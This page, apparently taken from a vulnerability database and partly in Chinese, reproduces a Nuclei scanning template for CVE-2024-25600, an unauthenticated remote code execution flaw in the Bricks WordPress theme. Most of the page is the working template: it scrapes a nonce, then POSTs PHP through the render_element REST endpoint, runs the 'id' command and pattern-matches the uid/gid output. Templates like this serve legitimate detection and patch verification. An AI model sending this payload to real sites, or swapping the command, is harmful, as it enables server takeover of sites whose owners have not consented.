CVE-2024-25600: Unauthenticated Remote Code Execution – Bricks <= 1.9.6

日期: 2025-08-01 | 影响软件: Bricks | POC: 已公开

漏洞描述

Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities

PoC代码[已公开]

id: CVE-2024-25600

info:
  name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
  author: christbowel
  severity: critical
  description: |
    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
    - https://github.com/Chocapikk/CVE-2024-25600
    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
  classification:
    epss-score: 0.93728
    epss-percentile: 0.99845
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/themes/bricks/"
  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce,vkev

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-json/bricks/v1/render_element HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "postId": "1",
          "nonce": "{{nonce}}",
          "element": {
            "name": "container",
            "settings": {
              "hasLoop": "true",
              "query": {
                "useQueryEditor": true,
                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
                "objectType": "post"
              }
            }
          }
        }
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "Exception:"
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true
# digest: 4a0a0047304502200462e89562364f2e8b429acc6556eca1ca369a15a0a3bcb9d0525304d4555c620221009a54f2c499d42b002293db84e99c1a1dc933df01d98febe99e43d91514dcdc78:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-25600.yaml

相关漏洞推荐